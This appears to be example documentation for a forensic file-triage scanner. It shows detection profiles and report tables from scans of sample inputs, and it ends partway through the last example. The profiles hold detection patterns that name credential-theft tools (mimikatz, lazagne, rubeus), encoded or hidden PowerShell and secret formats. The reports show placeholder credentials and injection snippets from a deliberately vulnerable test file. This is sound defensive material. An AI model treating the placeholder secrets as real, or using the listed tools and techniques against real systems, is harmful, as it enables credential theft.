[[patterns]]
  name = "AWS Access Key"
  pattern = "AKIA[0-9A-Z]{16}"
  type = "regex"

[[patterns]]
  name = "AWS Secret Key"
  pattern = "(?i)aws(.{0,20})?['\"][0-9a-zA-Z/+]{40}['\"]"
  type = "regex"

# Private Keys
[[patterns]]
  name = "RSA Private Key"
  pattern = "-----BEGIN RSA PRIVATE KEY-----"
  type = "string"

[[patterns]]
  name = "Generic Private Key"
  pattern = "-----BEGIN PRIVATE KEY-----"
  type = "string"

[[patterns]]
  name = "Encrypted Private Key"
  pattern = "-----BEGIN ENCRYPTED PRIVATE KEY-----"
  type = "string"

[[patterns]]
  name = "DSA Private Key"
  pattern = "-----BEGIN DSA PRIVATE KEY-----"
  type = "string"

[[patterns]]
  name = "EC Private Key"
  pattern = "-----BEGIN EC PRIVATE KEY-----"
  type = "string"

[[patterns]]
  name = "OpenSSH Private Key"
  pattern = "-----BEGIN OPENSSH PRIVATE KEY-----"
  type = "string"

[[patterns]]
  name = "PGP Private Key"
  pattern = "-----BEGIN PGP PRIVATE KEY BLOCK-----"
  type = "string"

# SSH Keys
[[patterns]]
  name = "SSH Public Key"
  pattern = "ssh-rsa\\s+[A-Za-z0-9+/]+[=]{0,2}"
  type = "regex"

# Passwords
[[patterns]]
  name = "Password Assignment"
  pattern = "(password|passwd|pwd)\\s*[:=]\\s*['\"][^'\"]+['\"]"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "Password in URL"
  pattern = "://[^:]+:[^@]+@"
  type = "regex"

# API Keys
[[patterns]]
  name = "Generic API Key"
  pattern = "api[_-]?key\\s*[:=]\\s*['\"][^'\"]+['\"]"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "Authorization Header"
  pattern = "Authorization:\\s*(Bearer|Basic)\\s+\\S+"
  type = "regex"
  case-insensitive = true

# Database Connection Strings
[[patterns]]
  name = "JDBC Connection URL"
  pattern = "jdbc:[a-z]+://[^\\s'\"<>]+"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "MongoDB Connection"
  pattern = "mongodb(\\+srv)?://[^\\s'\"<>]+"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "PostgreSQL Connection"
  pattern = "postgres(ql)?://[^\\s'\"<>]+"
  type = "regex"
  case-insensitive = true

# Signatures for advanced detection
[[signatures]]
  name = "High Entropy Files"
  query = "SELECT sha256 FROM unique_files WHERE shannon_entropy > 7.5"

[[signatures]]
  name = "Files with Credential Patterns"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name IN ('AWS Access Key', 'Password Assignment', 'Generic API Key', 'RSA Private Key')"

Report outputs

Triage report (converted from triage_report.json)

total_files	3
critical_count	0
high_count	0
medium_count	0
low_count	0
minimal_count	3
must_investigate_count	0
all_scores	None
generated_at	2025-12-03T09:19:43.519723872+00:00

top_scores

file_type	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
Other	False	/config_with_secrets.env	15	14	13	["14 suspicious patterns detected"]	Minimal	28	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b
Other	False	/private_keys.pem	5	3	5	["3 suspicious patterns detected"]	Minimal	10	0091c2a702bc8cc8130bffb5638cdbf0162396251f737c634568af23ec54a8de
Other	False	/aws_credentials.txt	5	3	5	["3 suspicious patterns detected"]	Minimal	10	5964c750b2220b877737247f9ea4cfa7c82eadb65d614ac92648bcf46fc8e91e

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension
/private_keys.pem	private_keys.pem	0091c2a702bc8cc8130bffb5638cdbf0162396251f737c634568af23ec54a8de	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	["application/x-x509-ca-cert"]
/aws_credentials.txt	aws_credentials.txt	5964c750b2220b877737247f9ea4cfa7c82eadb65d614ac92648bcf46fc8e91e	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	["text/plain"]
/config_with_secrets.env	config_with_secrets.env	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	[]

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	0091c2a702bc8cc8130bffb5638cdbf0162396251f737c634568af23ec54a8de	RSA Private Key	string	-----BEGIN RSA PRIVATE KEY-----	0:0	31
2	0091c2a702bc8cc8130bffb5638cdbf0162396251f737c634568af23ec54a8de	Generic Private Key	string	-----BEGIN PRIVATE KEY-----	7:1	27
3	0091c2a702bc8cc8130bffb5638cdbf0162396251f737c634568af23ec54a8de	OpenSSH Private Key	string	-----BEGIN OPENSSH PRIVATE KEY-----	12:1	35
4	5964c750b2220b877737247f9ea4cfa7c82eadb65d614ac92648bcf46fc8e91e	AWS Access Key	regex	AKIAIOSFODNN7EXAMPLE	4:18	20
5	5964c750b2220b877737247f9ea4cfa7c82eadb65d614ac92648bcf46fc8e91e	AWS Access Key	regex	AKIAI44QH8DHBEXAMPLE	8:14	20
6	5964c750b2220b877737247f9ea4cfa7c82eadb65d614ac92648bcf46fc8e91e	AWS Secret Key	regex	AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"	5:0	64
7	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	SSH Public Key	regex	ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFakeKeyForTestingPurposesOnlyDoNotUseInProduction1234567890abcdef	19:0	104
8	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	Password Assignment	regex	password = "MySecretPassword123!"	14:0	33
9	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	Password Assignment	regex	PASSWORD: "AnotherTestPassword"	15:0	31
10	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	Password Assignment	regex	password="admin123"	16:6	19
11	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	Password in URL	regex	://admin:SuperSecretPassword123@	4:23	32
12	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	Password in URL	regex	://user:password123@	5:23	20
13	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	Password in URL	regex	://localhost:3306/testdb?user=root&password=secret# API ConfigurationAPI_KEY = "sk-1234567890abcdefghijklmnopqrstuvwxyz"api_key: "test-api-key-12345678"Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.dozjgNryP4J3jVmNHl0w5N_XgL0n3I9PlFUP0THsR8U# User credentials (DO NOT USE IN PRODUCTION)password = "MySecretPassword123!"PASSWORD: "AnotherTestPassword"admin_password="admin123"# SSH Keyssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFakeKeyForTestingPurposesOnlyDoNotUseInProduction1234567890abcdef test@	6:19	548
14	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	Password in URL	regex	://user:password@	22:3	17
15	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	Generic API Key	regex	API_KEY = "sk-1234567890abcdefghijklmnopqrstuvwxyz"	9:0	51
16	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	Generic API Key	regex	api_key: "test-api-key-12345678"	10:0	32
17	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	Authorization Header	regex	Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.dozjgNryP4J3jVmNHl0w5N_XgL0n3I9PlFUP0THsR8U	11:0	130
18	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	JDBC Connection URL	regex	jdbc:mysql://localhost:3306/testdb?user=root&password=secret	6:9	60
19	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	MongoDB Connection	regex	mongodb+srv://user:password123@cluster.mongodb.net/database	5:12	59
20	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	PostgreSQL Connection	regex	postgresql://admin:SuperSecretPassword123@db.example.com:5432/myapp	4:13	67

signature_matches.csv

id	signature_name	sha256
1	Files with Credential Patterns	5964c750b2220b877737247f9ea4cfa7c82eadb65d614ac92648bcf46fc8e91e
2	Files with Credential Patterns	b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b
3	Files with Credential Patterns	0091c2a702bc8cc8130bffb5638cdbf0162396251f737c634568af23ec54a8de

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
0091c2a702bc8cc8130bffb5638cdbf0162396251f737c634568af23ec54a8de	4109a9c0dc6cdc2ea9dc6f37a0f2ad18e84a3394	91dbfca56498590a6d1b70c7beab2718	681	application/x-pem-file	5.3871589121742
5964c750b2220b877737247f9ea4cfa7c82eadb65d614ac92648bcf46fc8e91e	c8e4b788302bc5aa5e7e664fc330be3799c1c6f0	0293f7de0c62a5250d8f27edb2c76912	314	text/plain	5.36704333995266
b56f97584131413e099ccf4effe9476ac892328888db8ce68a7a12f6d1cc479b	6b7f51ab4e5ebe29cd1a07b3322dadffd6755685	225ac88b0bc222303b86cfea552ce119	880	text/plain	5.76111717536657

Example: snapshot

Inputs

examples/inputs/snapshot-samples/system_state.txt

Profile

# System Snapshot Example
# Note: This demonstrates the --system-snapshot feature
# The actual snapshot captures live system state (processes, network, etc.)

decode = []

tag = "snapshot"

# Process patterns
[[patterns]]
  name = "Suspicious Process Name"
  pattern = "mimikatz|procdump|lazagne|rubeus"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "PowerShell Hidden"
  pattern = "powershell.*-w.*hidden"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "Encoded PowerShell"
  pattern = "powershell.*-enc"
  type = "regex"
  case-insensitive = true

# Network patterns
[[patterns]]
  name = "Suspicious Port"
  pattern = ":4444|:5555|:1337|:31337"
  type = "regex"

[[patterns]]
  name = "Outbound Connection"
  pattern = "ESTABLISHED.*[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+"
  type = "regex"

# Module/DLL patterns
[[patterns]]
  name = "Suspicious DLL"
  pattern = "amsi\\.dll|clrjit\\.dll"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "Reflective Loading"
  pattern = "clr\\.dll.*loaded"
  type = "regex"
  case-insensitive = true

Report outputs

Triage report (converted from triage_report.json)

total_files	1
critical_count	0
high_count	0
medium_count	0
low_count	0
minimal_count	1
must_investigate_count	0
all_scores	None
generated_at	2025-12-03T09:19:44.817739057+00:00

top_scores

characteristics_score	file_type	file_type_score	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
0	Other	0	False	/system_state.txt	15	14	13	["14 suspicious patterns detected"]	Minimal	28	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_symbolic_link	is_extracted_file	is_decoded_file	is_deobfuscated_file	tag
/system_state.txt	system_state.txt	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	["text/plain"]	0	0	0	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	Suspicious Process Name	regex	mimikatz	8:17	8
2	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	Suspicious Process Name	regex	mimikatz	8:44	8
3	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	Suspicious Process Name	regex	procdump	9:17	8
4	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	Suspicious Process Name	regex	procdump	9:44	8
5	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	PowerShell Hidden	regex	powershell.exe, CommandLine: powershell -w hidden	5:17	49
6	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	Encoded PowerShell	regex	powershell.exe, CommandLine: powershell -w hidden -enc	5:17	54
7	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	Suspicious Port	regex	:4444	13:59	5
8	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	Suspicious Port	regex	:5555	14:57	5
9	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	Suspicious Port	regex	:1337	15:26	5
10	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	Suspicious Port	regex	:31337	16:26	6
11	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	Suspicious DLL	regex	amsi.dll	19:33	8
12	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	Suspicious DLL	regex	amsi.dll	19:69	8
13	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	Suspicious DLL	regex	clrjit.dll	20:30	10
14	ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	Reflective Loading	regex	clr.dll, Status: loaded	21:30	23

signature_matches.csv

Empty CSV

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
ffb4c31ae38df4db765bec14e2892e10e1e5fe6bb8c762e340d992d37e7c7f71	d02f4f12e100aa1bbdea10dc5f79463d74d6e19e	6c6797a5077959fc4637e4b556085bed	1426	text/plain	5.19923754732871

Example: triage

Inputs

examples/inputs/triage-samples/vulnerable_app.java

Profile

# Triage and Risk Scoring Example Profile
# Demonstrates triage report generation with risk scoring

decode = ["base64", "hex"]

max-file-size = 52428800  # 50 MiB

tag = "triage"

# High-risk patterns (higher weight in scoring)
[[patterns]]
  name = "Command Injection"
  pattern = "Runtime\\.getRuntime\\(\\)\\.exec\\("
  type = "regex"

[[patterns]]
  name = "SQL Injection"
  pattern = "(?i)(select|insert|update|delete|drop|union).*from"
  type = "regex"

[[patterns]]
  name = "Path Traversal"
  pattern = "\\.\\./\\.\\./\\.\\./"
  type = "regex"

[[patterns]]
  name = "Remote Code Execution"
  pattern = "eval\\s*\\([^)]*\\$"
  type = "regex"

# Medium-risk patterns
[[patterns]]
  name = "Hardcoded Password"
  pattern = "password\\s*=\\s*['\"][^'\"]{8,}['\"]"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "API Key"
  pattern = "api[_-]?key\\s*=\\s*['\"][^'\"]{16,}['\"]"
  type = "regex"
  case-insensitive = true

# Signatures for risk scoring
[[signatures]]
  name = "High Entropy Suspicious"
  query = "SELECT sha256 FROM unique_files WHERE shannon_entropy > 7.5"

[[signatures]]
  name = "Multiple Pattern Matches"
  query = "SELECT sha256, COUNT(*) as matches FROM pattern_matches GROUP BY sha256 HAVING matches > 3"

Report outputs

Triage report (converted from triage_report.json)

total_files	1
critical_count	0
high_count	0
medium_count	0
low_count	0
minimal_count	1
must_investigate_count	0
generated_at	2025-12-03T09:19:44.871932886+00:00

top_scores

characteristics_score	file_type	file_type_score	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
0	Other	0	False	/vulnerable_app.java	10	7	9	["7 suspicious patterns detected"]	Minimal	19	d72c3fd8cb250df27971c5ec01617f81fa34a607440f08c95f856570d69fd055

all_scores

characteristics_score	file_type	file_type_score	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
0	Other	0	False	/vulnerable_app.java	10	7	9	["7 suspicious patterns detected"]	Minimal	19	d72c3fd8cb250df27971c5ec01617f81fa34a607440f08c95f856570d69fd055

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_symbolic_link	is_extracted_file	is_decoded_file	is_deobfuscated_file	tag
/vulnerable_app.java	vulnerable_app.java	d72c3fd8cb250df27971c5ec01617f81fa34a607440f08c95f856570d69fd055	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	[]	0	0	0	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	d72c3fd8cb250df27971c5ec01617f81fa34a607440f08c95f856570d69fd055	Command Injection	regex	Runtime.getRuntime().exec(	7:8	26
2	d72c3fd8cb250df27971c5ec01617f81fa34a607440f08c95f856570d69fd055	SQL Injection	regex	SELECT * FROM	12:24	13
3	d72c3fd8cb250df27971c5ec01617f81fa34a607440f08c95f856570d69fd055	SQL Injection	regex	SELECT name FROM users UNION SELECT password FROM	14:25	49
4	d72c3fd8cb250df27971c5ec01617f81fa34a607440f08c95f856570d69fd055	Path Traversal	regex	../../../	19:33	9
5	d72c3fd8cb250df27971c5ec01617f81fa34a607440f08c95f856570d69fd055	Remote Code Execution	regex	eval($	30:8	6
6	d72c3fd8cb250df27971c5ec01617f81fa34a607440f08c95f856570d69fd055	Hardcoded Password	regex	PASSWORD = "SuperSecret123!"	24:35	28
7	d72c3fd8cb250df27971c5ec01617f81fa34a607440f08c95f856570d69fd055	API Key	regex	API_KEY = "sk-1234567890abcdefghijklmnop"	25:32	41

signature_matches.csv

id	signature_name	sha256
1	Multiple Pattern Matches	d72c3fd8cb250df27971c5ec01617f81fa34a607440f08c95f856570d69fd055

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
d72c3fd8cb250df27971c5ec01617f81fa34a607440f08c95f856570d69fd055	569213c480f1f16a4aee71518abb2fe52f5c11cf	74a23ade7caca99c1f48bd7cf2daff2f	1047	text/plain	4.83469776402311

Example: vdi-forensic

Inputs

examples/inputs/vdi-forensic-samples/README.md
examples/inputs/vdi-forensic-samples/sample.vdi

Profile

# VDI Forensic Image Example Profile
# Demonstrates analysis of VDI (VirtualBox Disk Image) forensic disk images

decode = ["base64"]

max-file-size = 104857600  # 100 MiB

tag = "vdi-forensic"

# Patterns to match in VDI images and extracted partitions
[[patterns]]
  name = "VDI Signature"
  pattern = "3C:3C:3C:20:4F:72:61:63:6C:65:20:56:4D:20:56:69:72:74:75:61:6C:42:6F:78:20:44:69:73:6B:20:49:6D:61:67:65:20:3E:3E:3E"  # "<<< Oracle VM VirtualBox Disk Image >>>"
  type = "bytes"

[[patterns]]
  name = "AWS Access Key"
  pattern = "AKIA[0-9A-Z]{16}"
  type = "regex"

[[patterns]]
  name = "SSH Private Key"
  pattern = "-----BEGIN.*PRIVATE KEY-----"
  type = "regex"

[[patterns]]
  name = "Password in Config"
  pattern = "password\\s*=\\s*['\"]?[^'\"\\s]+"
  type = "regex"

[[patterns]]
  name = "MBR Boot Signature"
  pattern = "55:AA"
  type = "bytes"

[[patterns]]
  name = "GPT Signature"
  pattern = "45:46:49:20:50:41:52:54"  # "EFI PART"
  type = "bytes"

[[patterns]]
  name = "NTFS Signature"
  pattern = "4E:54:46:53"  # "NTFS"
  type = "bytes"

[[patterns]]
  name = "Email Address"
  pattern = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}"
  type = "regex"

Report outputs

Triage report (converted from triage_report.json)

total_files	3
critical_count	0
high_count	0
medium_count	0
low_count	0
minimal_count	3
must_investigate_count	0
all_scores	None
generated_at	2026-01-31T11:16:24.674386602+00:00

top_scores

file_type	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
Other	False	/sample.vdi	5	3	5	["3 suspicious patterns detected"]	Minimal	10	2425928183833b701db53330df74b8ecabaccca0bb9387b5912c9b063b4330da
Other	False	/README.md	0	0	0	[]	Minimal	0	8ba3251c88e8b3af88fa07dd0f3d971d3fc77a482c749df9f2a918463505b17f
Other	False	/sample.vdi/sample.vdi:vdi:metadata	0	0	0	[]	Minimal	0	4019f36e944abb83e210a1bde7c7acbf83939cb0ecc6e5cf2e63b505ff299053

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_extracted_file
/README.md	README.md	8ba3251c88e8b3af88fa07dd0f3d971d3fc77a482c749df9f2a918463505b17f	2026-01-31T10:59:09.277752156Z	2026-01-31T10:59:09.277752156Z	2026-01-31T11:14:23.615342869Z	["application/x-genesis-rom"]	0
/sample.vdi/sample.vdi:vdi:metadata	sample.vdi:vdi:metadata	4019f36e944abb83e210a1bde7c7acbf83939cb0ecc6e5cf2e63b505ff299053				[]	1
/sample.vdi	sample.vdi	2425928183833b701db53330df74b8ecabaccca0bb9387b5912c9b063b4330da	2026-01-31T10:59:09.277752156Z	2026-01-31T10:59:09.277752156Z	2026-01-31T11:14:23.618342852Z	["application/x-virtualbox-vdi"]	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	2425928183833b701db53330df74b8ecabaccca0bb9387b5912c9b063b4330da	VDI Signature	bytes	<<< Oracle VM VirtualBox Disk Image >>>	0	39
2	2425928183833b701db53330df74b8ecabaccca0bb9387b5912c9b063b4330da	Password in Config	regex	password=secret123	2:1146	530
3	2425928183833b701db53330df74b8ecabaccca0bb9387b5912c9b063b4330da	Email Address	regex	test@example.com	2:874	16

signature_matches.csv

Empty CSV

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
8ba3251c88e8b3af88fa07dd0f3d971d3fc77a482c749df9f2a918463505b17f	5c79232bb4f3a5aa1f65c89953bfe4e4b33018db	7ce5d9f6b16afaf816d24d15ebaebe61	2485	text/plain	4.95595005475133
4019f36e944abb83e210a1bde7c7acbf83939cb0ecc6e5cf2e63b505ff299053	2d6e5017ba9c53f7ebc169fce1e24816731a10e5	bb758e05fa810418c2897fefd338692c	780	text/plain	4.9247329246529
2425928183833b701db53330df74b8ecabaccca0bb9387b5912c9b063b4330da	cae18f1431599956ccb716d4de542977cfece2a3	1b25066a83041414ba7197fc9687277f	1714	application/x-virtualbox-vdi	0.617522089298005

Example: vhd-forensic

Inputs

examples/inputs/vhd-forensic-samples/README.md
examples/inputs/vhd-forensic-samples/sample.vhd

Profile

# VHD Forensic Image Example Profile
# Demonstrates analysis of VHD (Virtual Hard Disk) forensic disk images

decode = ["base64"]

max-file-size = 104857600  # 100 MiB

tag = "vhd-forensic"

# Patterns to match in VHD images and extracted partitions
[[patterns]]
  name = "VHD Signature"
  pattern = "63:6F:6E:65:63:74:69:78"  # "conectix" at footer
  type = "bytes"

[[patterns]]
  name = "AWS Access Key"
  pattern = "AKIA[0-9A-Z]{16}"
  type = "regex"

[[patterns]]
  name = "AWS Secret Key"
  pattern = "(?i)aws.{0,20}secret.{0,20}['\"][0-9a-zA-Z/+=]{40}['\"]"
  type = "regex"

[[patterns]]
  name = "SSH Private Key"
  pattern = "-----BEGIN.*PRIVATE KEY-----"
  type = "regex"

[[patterns]]
  name = "Password in Config"
  pattern = "password\\s*=\\s*['\"]?[^'\"\\s]+"
  type = "regex"

[[patterns]]
  name = "Database Connection String"
  pattern = "jdbc:[a-zA-Z0-9]+://[^\\s]+password=[^\\s&;]+"
  type = "regex"

[[patterns]]
  name = "MBR Boot Signature"
  pattern = "55:AA"
  type = "bytes"

[[patterns]]
  name = "GPT Signature"
  pattern = "45:46:49:20:50:41:52:54"  # "EFI PART"
  type = "bytes"

[[patterns]]
  name = "NTFS Signature"
  pattern = "4E:54:46:53"  # "NTFS"
  type = "bytes"

[[patterns]]
  name = "Email Address"
  pattern = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}"
  type = "regex"

Report outputs

Triage report (converted from triage_report.json)

total_files	3
critical_count	0
high_count	0
medium_count	0
low_count	0
minimal_count	3
must_investigate_count	0
all_scores	None
generated_at	2026-01-31T14:40:44.798620233+00:00

top_scores

file_type	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
Other	False	/sample.vhd	5	5	8	["5 suspicious patterns detected"]	Minimal	13	5678641cfe00dfe87174bec088a6ed724765f5477d5f3ee3b451f83f0deac4db
Other	False	/README.md	5	2	3	["2 suspicious patterns detected"]	Minimal	8	727e2112f3aa742c2fbc8a7a0e4b7a629c6c5f09f29325a86515c3577b04c657
Other	False	/sample.vhd/sample.vhd:vhd:metadata	0	0	0	[]	Minimal	0	59becf4cab63377618afc1b735b04b25705334d6824c934c348575b833f162eb

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_extracted_file
/README.md	README.md	727e2112f3aa742c2fbc8a7a0e4b7a629c6c5f09f29325a86515c3577b04c657	2026-01-31T14:35:39.975936764Z	2026-01-31T14:35:39.976936747Z	2026-01-31T14:36:08.737470505Z	["application/x-genesis-rom"]	0
/sample.vhd/sample.vhd:vhd:metadata	sample.vhd:vhd:metadata	59becf4cab63377618afc1b735b04b25705334d6824c934c348575b833f162eb				[]	1
/sample.vhd	sample.vhd	5678641cfe00dfe87174bec088a6ed724765f5477d5f3ee3b451f83f0deac4db	2026-01-31T14:35:03.913534019Z	2026-01-31T14:35:03.914534002Z	2026-01-31T14:36:08.738470489Z	["application/x-vhd"]	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	727e2112f3aa742c2fbc8a7a0e4b7a629c6c5f09f29325a86515c3577b04c657	VHD Signature	bytes	conectix	415	8
2	727e2112f3aa742c2fbc8a7a0e4b7a629c6c5f09f29325a86515c3577b04c657	VHD Signature	bytes	conectix	1233	8
3	5678641cfe00dfe87174bec088a6ed724765f5477d5f3ee3b451f83f0deac4db	VHD Signature	bytes	conectix	1048576	8
4	5678641cfe00dfe87174bec088a6ed724765f5477d5f3ee3b451f83f0deac4db	AWS Access Key	regex	AKIAIOSFODNN7EXAMPLE	2:15	20
5	5678641cfe00dfe87174bec088a6ed724765f5477d5f3ee3b451f83f0deac4db	SSH Private Key	regex	-----BEGIN RSA PRIVATE KEY-----	5:0	31
6	5678641cfe00dfe87174bec088a6ed724765f5477d5f3ee3b451f83f0deac4db	Password in Config	regex	password = super_secret_123	3:0	27
7	5678641cfe00dfe87174bec088a6ed724765f5477d5f3ee3b451f83f0deac4db	Email Address	regex	user@example.com	4:0	16

signature_matches.csv

Empty CSV

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
727e2112f3aa742c2fbc8a7a0e4b7a629c6c5f09f29325a86515c3577b04c657	51db17240ab464138436782b8faab570198e00bc	7179526643f27b072e53e5140edc5db3	2573	text/plain	4.98682022434222
59becf4cab63377618afc1b735b04b25705334d6824c934c348575b833f162eb	81b99cffda0fef23a30ae18f75b2204aed85f190	4dde8029b491ba34491e416d58205826	838	text/plain	4.99978188275922
5678641cfe00dfe87174bec088a6ed724765f5477d5f3ee3b451f83f0deac4db	1f9d2a442a6561d63276886076a435faddf0e606	0cb25891268c7394b7f32ded41f9a275	1049088	application/octet-stream	0.00398315440918742

Example: vhdx-forensic

Inputs

examples/inputs/vhdx-forensic-samples/README.md
examples/inputs/vhdx-forensic-samples/sample.vhdx

Profile

# VHDX Forensic Image Example Profile
# Demonstrates analysis of VHDX (Virtual Hard Disk v2) forensic disk images

decode = ["base64"]

max-file-size = 104857600  # 100 MiB

tag = "vhdx-forensic"

# Patterns to match in VHDX images and extracted partitions
[[patterns]]
  name = "VHDX Signature"
  pattern = "76:68:64:78:66:69:6C:65"  # "vhdxfile" at header
  type = "bytes"

[[patterns]]
  name = "AWS Access Key"
  pattern = "AKIA[0-9A-Z]{16}"
  type = "regex"

[[patterns]]
  name = "AWS Secret Key"
  pattern = "(?i)aws.{0,20}secret.{0,20}['\"][0-9a-zA-Z/+=]{40}['\"]"
  type = "regex"

[[patterns]]
  name = "SSH Private Key"
  pattern = "-----BEGIN.*PRIVATE KEY-----"
  type = "regex"

[[patterns]]
  name = "Password in Config"
  pattern = "password\\s*=\\s*['\"]?[^'\"\\s]+"
  type = "regex"

[[patterns]]
  name = "Database Connection String"
  pattern = "jdbc:[a-zA-Z0-9]+://[^\\s]+password=[^\\s&;]+"
  type = "regex"

[[patterns]]
  name = "MBR Boot Signature"
  pattern = "55:AA"
  type = "bytes"

[[patterns]]
  name = "GPT Signature"
  pattern = "45:46:49:20:50:41:52:54"  # "EFI PART"
  type = "bytes"

[[patterns]]
  name = "NTFS Signature"
  pattern = "4E:54:46:53"  # "NTFS"
  type = "bytes"

[[patterns]]
  name = "Email Address"
  pattern = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}"
  type = "regex"

Report outputs

Triage report (converted from triage_report.json)

total_files	3
critical_count	0
high_count	0
medium_count	0
low_count	0
minimal_count	3
must_investigate_count	0
all_scores	None
generated_at	2026-01-31T14:40:53.032681135+00:00

top_scores

file_type	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
Other	False	/sample.vhdx	10	6	8	["6 suspicious patterns detected"]	Minimal	18	a20805a2e25dfc53905a11213b4f184f430d98ec199c8d69267195a5408628ef
Other	False	/README.md	5	2	3	["2 suspicious patterns detected"]	Minimal	8	38a13bd791913971e0ef62805930c72598bd549f7ae1e38d77436111d9c0d0d0
